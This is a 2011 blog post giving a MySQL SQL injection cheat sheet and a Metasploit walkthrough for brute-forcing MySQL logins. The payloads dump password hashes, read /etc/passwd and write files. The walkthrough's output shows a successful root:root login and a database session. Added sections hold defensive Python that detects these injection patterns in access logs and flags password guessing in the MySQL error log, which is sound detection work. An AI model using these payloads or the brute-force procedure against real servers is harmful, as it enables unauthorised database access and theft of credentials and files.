Sunday, January 16, 2011

SQL Injection Cheatsheet

* MySQL

Payload:      select @@version;
Description:  View database version.

Payload:      select host,user,db from mysql.db;
Description:  Misc. information disclosure.

Payload:      select host,user,password from mysql.user;
Description:  View MySQL usernames and password hashes.

Payload:      create table myfile (input TEXT); load data infile '/etc/passwd' into table myfile; OR load data infile '/home/{user}/.rhosts' into table myfile; select * from myfile;
Description:  Reading files on the filesystem (requires the FILE privilege).

Payload:      select host,user,password from user into outfile '/tmp/passwd';
Description:  Write files on the filesystem. This attack is limited by the fact that you can only write to either "/tmp" or "/var/tmp" (and, where secure_file_priv is set, only to the directory it names).

Payload:      select CONCAT("a","b");
Description:  Concatenate strings for blind SQL injection tests.

Payload:      BENCHMARK(1000000000,MD5('gainingtime'))
Description:  Cause a delay for blind SQL injection tests.

Payload:      BENCHMARK(1000000000,MD5(CHAR(116)))
Description:  Cause a delay for blind SQL injection tests. Same as before, but this can be used if quotes are filtered.

Payload:      IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5('gainingtime'))
Description:  Check if the username exists; if yes there will be a delay.

Payload:      IF EXISTS (SELECT * FROM users WHERE username = 'root') WAITFOR DELAY '0:0:3'
Description:  Check if the username exists; if yes there will be a delay of 3 seconds. Note that WAITFOR DELAY is T-SQL (MSSQL) syntax; on MySQL the equivalent delay primitives are SLEEP() and BENCHMARK().
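The primitives in the table above (version disclosure, reads of mysql.user, LOAD DATA INFILE, INTO OUTFILE, BENCHMARK/SLEEP delays) are also what a defender looks for in web-server logs. The following is an added example, not part of the original cheat sheet: it URL-decodes request paths from constructed access-log lines and tags each one with the technique it indicates. The indicator regexes and the log format (Common Log Format) are assumptions made for this example.

```python
"""Flag the MySQL injection primitives from the cheat sheet in access-log lines.

Added example (not part of the original post). Scans constructed
Common-Log-Format lines, URL-decodes the request path and reports which
technique each suspicious request indicates.
"""
import re
from urllib.parse import unquote_plus

# Patterns grouped by the technique they indicate. The regexes are an
# assumption made for this example; tune them against real traffic.
INDICATORS = {
    "version_disclosure": re.compile(r"@@version|version\(\)", re.I),
    "credential_read":    re.compile(r"\bmysql\.(user|db)\b", re.I),
    "file_read":          re.compile(r"\bload\s+data\s+infile\b", re.I),
    "file_write":         re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "time_delay":         re.compile(r"\bbenchmark\s*\(|\bsleep\s*\(|waitfor\s+delay", re.I),
    "blind_concat":       re.compile(r"\bconcat\s*\(", re.I),
}

# Common Log Format: host ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_request(path: str) -> str:
    """URL-decode repeatedly so double-encoded payloads (%2527 -> %27 -> ') are visible."""
    prev, cur = None, path
    for _ in range(3):          # bounded so a pathological input cannot loop forever
        prev, cur = cur, unquote_plus(cur)
        if cur == prev:
            break
    return cur


def classify(path: str) -> list:
    """Return the indicator names matched by one request path after decoding."""
    decoded = decode_request(path)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def scan(lines):
    """Yield (source_host, decoded_path, indicators) for every suspicious log line."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                       # not CLF; skip rather than guess
        hits = classify(m.group("path"))
        if hits:
            yield m.group("host"), decode_request(m.group("path")), hits


# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Jan/2011:10:01:02 +0000] "GET /item.php?id=7 HTTP/1.1" 200 512',
    '10.0.0.9 - - [16/Jan/2011:10:01:05 +0000] "GET /item.php?id=7%20union%20select%20@@version HTTP/1.1" 500 0',
    '10.0.0.9 - - [16/Jan/2011:10:01:09 +0000] "GET /item.php?id=7%20and%20BENCHMARK(1000000000,MD5(CHAR(116))) HTTP/1.1" 200 512',
    '10.0.0.9 - - [16/Jan/2011:10:01:15 +0000] "GET /item.php?id=7%2527%20into%20outfile%20%2527/tmp/x%2527 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for host, path, hits in scan(SAMPLE_LOG):
        print(f"{host}  {', '.join(hits):<20} {path}")
```

The BENCHMARK line is the interesting one for a web application firewall or log review: a time-based blind test returns a normal 200 with the usual page size, so only the request content, not the status code, gives it away. Repeated decoding matters because a single pass leaves %2527 as %27 and the quote never appears.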

Brute-forcing MySQL using Metasploit

# the victim's MySQL port (3306) must be reachable
# create a file, e.g. PASS.txt, containing candidate passwords, one per line
# create a file, e.g. USERS.txt, containing candidate usernames, one per line
here we go ...
msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt
PASS_FILE => /root/pass.txt
msf auxiliary(mysql_login) > set USER_FILE /root/users.txt
USER_FILE => /root/users.txt
msf auxiliary(mysql_login) > set RHOSTS 127.0.0.1   //example
RHOSTS => 127.0.0.1
msf auxiliary(mysql_login) > show options
Module options:

Name              Current Setting   Required  Description
----              ---------------   --------  -----------
BLANK_PASSWORDS   true              yes       Try blank passwords for all users
BRUTEFORCE_SPEED  5                 yes       How fast to bruteforce, from 0 to 5
PASSWORD                            no        A specific password to authenticate with
PASS_FILE         /root/pass.txt    no        File containing passwords, one per line
RHOSTS            127.0.0.1         yes       The target address range or CIDR identifier
RPORT             3306              yes       The target port
STOP_ON_SUCCESS   false             yes       Stop guessing when a credential works for a host
THREADS           1                 yes       The number of concurrent threads
USERNAME                            no        A specific username to authenticate as
USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
USER_FILE         /root/users.txt   no        File containing usernames, one per line
VERBOSE           true              yes       Whether to print output for all attempts


msf auxiliary(mysql_login) > exploit
[*] 127.0.0.1:3306 - Found remote MySQL version 5.1.41
[*] 127.0.0.1:3306 Trying username:'admin' with password:''
[*] 127.0.0.1:3306 failed to login as 'admin' with password ''
[*] 127.0.0.1:3306 Trying username:'root' with password:''
[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN 'root' : 'root'
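On the server side, every attempt the module makes above shows up as an "Access denied for user ..." line in the MySQL error log, and the pattern (one source host, many users, several failures per second) is easy to alert on. The following is an added example and not part of the original post: it parses constructed MySQL 5.7-style error-log lines and raises one alert per source host once a threshold of failures falls inside a sliding window. The log layout is an assumption; MySQL 5.1 (the version in the transcript) only writes these lines with log_warnings=2 and uses an older timestamp format, so the timestamp pattern would need adjusting there.

```python
"""Detect password guessing against MySQL from the server error log.

Added example, not from the original post. Assumes the MySQL 5.7+ error-log
layout: an ISO timestamp, a thread id, a level, then the
"Access denied for user 'u'@'h' (using password: YES|NO)" message.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

DENIED_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:\.\d+)?Z?)"
    r".*Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'"
    r" \(using password: (?P<pw>YES|NO)\)"
)


def parse_denied(line):
    """Return (timestamp, user, host, used_password) or None for other lines."""
    m = DENIED_RE.search(line)
    if not m:
        return None
    # Python < 3.11 fromisoformat() does not accept a trailing 'Z'
    ts = datetime.fromisoformat(m.group("ts").replace("Z", "+00:00"))
    return ts, m.group("user"), m.group("host"), m.group("pw") == "YES"


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Alert on any source host with >= threshold failed logins inside a sliding window.

    Returns one alert per host, raised the first time the threshold is crossed,
    with the host, the time of the crossing failure, the number of failures in
    the window and the sorted usernames that host has tried so far.
    """
    recent = defaultdict(deque)      # host -> timestamps of failures in the window
    users = defaultdict(set)         # host -> usernames attempted so far
    alerted = set()
    alerts = []
    for line in lines:
        parsed = parse_denied(line)
        if parsed is None:
            continue
        ts, user, host, _ = parsed
        q = recent[host]
        q.append(ts)
        users[host].add(user)
        while q and ts - q[0] > window:      # evict failures older than the window
            q.popleft()
        if len(q) >= threshold and host not in alerted:
            alerted.add(host)
            alerts.append({"host": host, "at": ts, "failures": len(q),
                           "users": sorted(users[host])})
    return alerts


# Constructed sample error-log lines for this example (not a real server log).
SAMPLE_ERROR_LOG = [
    "2011-01-16T10:02:00.000000Z 10 [Note] Access denied for user 'dave'@'10.0.0.5' (using password: YES)",
    "2011-01-16T10:02:01.000000Z 11 [Note] Access denied for user 'admin'@'10.0.0.9' (using password: NO)",
    "2011-01-16T10:02:02.000000Z 12 [Note] Access denied for user 'admin'@'10.0.0.9' (using password: YES)",
    "2011-01-16T10:02:03.000000Z 13 [Note] Access denied for user 'root'@'10.0.0.9' (using password: NO)",
    "2011-01-16T10:02:04.000000Z 14 [Note] Access denied for user 'root'@'10.0.0.9' (using password: YES)",
    "2011-01-16T10:02:05.000000Z 15 [Note] Access denied for user 'root'@'10.0.0.9' (using password: YES)",
    "2011-01-16T10:02:06.000000Z 16 [Note] Access denied for user 'root'@'10.0.0.9' (using password: YES)",
    "2011-01-16T10:02:07.000000Z 0 [Note] Event Scheduler: Loaded 0 events",
]

if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_ERROR_LOG):
        print(f"{a['at'].isoformat()}  {a['host']}  {a['failures']} failures, "
              f"users tried: {', '.join(a['users'])}")
```

The single failure from 10.0.0.5 never crosses the threshold (a mistyped password), while 10.0.0.9 alerts on its fifth failure. The alternating "using password: NO" / "YES" with the same username mirrors the BLANK_PASSWORDS behaviour in the module output above. The cheap mitigations are the ones the transcript makes obvious: do not expose 3306 beyond the hosts that need it (bind-address, firewall), and do not leave root with a guessable password.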


********************************************************************************
# mysql -h 127.0.0.1 -u root -proot
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 53
Server version: 5.1.41-3ubuntu12 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
+--------------------+
2 rows in set (0.01 sec)
mysql>

./finished